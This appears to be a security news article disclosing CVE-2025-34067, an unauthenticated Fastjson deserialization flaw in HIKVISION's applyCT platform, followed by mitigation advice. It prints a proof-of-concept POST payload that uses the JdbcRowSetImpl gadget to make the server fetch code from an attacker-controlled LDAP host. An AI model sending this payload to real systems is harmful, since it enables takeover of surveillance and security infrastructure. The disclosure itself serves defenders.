Critical HIKVISION applyCT Flaw (CVE-2025-34067, CVSS 10.0): Unauthenticated RCE Via Fastjson

A newly disclosed vulnerability in HIKVISION’s widely deployed security management platform, applyCT (previously known as HikCentral), has put countless surveillance and monitoring infrastructures at risk. Tracked as CVE-2025-34067 with a maximum CVSS v4 severity rating of 10, the flaw allows for unauthenticated remote command execution through a critical deserialization weakness.

HIKVISION applyCT is a centralized platform used by commercial, governmental, and industrial sectors to monitor and control security devices at scale. The platform’s integration with advanced analytics and scalable architecture has made it a popular choice for high-security environments.

But its reliance on a vulnerable version of the Fastjson library in its applyCT component has opened the door to serious exploitation. The vulnerability stems from how JSON payloads are handled in the /bic/ssoService/v1/applyCT endpoint.

“An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library,” reads the CVE description.

Fastjson, a widely-used Java library for parsing JSON, includes an “auto-type” feature that can load Java classes dynamically. When improperly configured, it allows attackers to submit malicious JSON objects that instantiate arbitrary classes—essentially letting them run whatever code they want on the backend system.

The vulnerability is triggered by sending a specially crafted POST request with a JSON payload that instructs the system to deserialize a Java class—specifically the JdbcRowSetImpl—from a remote LDAP server controlled by the attacker.

Here’s a simplified version of the proof-of-concept payload:

POST /bic/ssoService/v1/applyCT 
Content-Type: application/json

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

“The malformed payload is sent to the /bic/ssoService/v1/applyCT endpoint using a POST request… By manipulating the datasource parameter to point to an untrusted LDAP server, the attacker can gain control over the server.”

This vulnerability effectively allows remote code execution (RCE) without any need for authentication, meaning attackers could exploit it over the internet if the vulnerable endpoint is exposed.

HIKVISION platforms are often used to manage critical physical security systems, making this not just a cybersecurity issue, but also a physical security concern. Successful exploitation could allow attackers to:

• Hijack surveillance systems
• Manipulate or disable security feeds
• Lateral move within the network
• Launch additional internal attacks

Organizations using HIKVISION applyCT or any HikCentral variants should take immediate action:

• Audit and identify if the system is exposing the /bic/ssoService/v1/applyCT endpoint.
• Update to a patched version of the Fastjson library or apply any security updates provided by HIKVISION.
• Isolate the system from direct internet access if not strictly necessary.
• Monitor for suspicious outbound LDAP traffic.

Related Posts:

• FASTJSON Remote Code Execution Vulnerability
• Hikvision Patches Security Flaw in Network Cameras, Preventing Cleartext Credential Transmission
• Canada Bans Hikvision Operations Nationwide Citing National Security Threat
• Zero-click Hikvision cameras RCE flaw affects 80,000 devices
• Hikvision HikCentral Master Lite and Professional Affected by Multi Vulnerabilities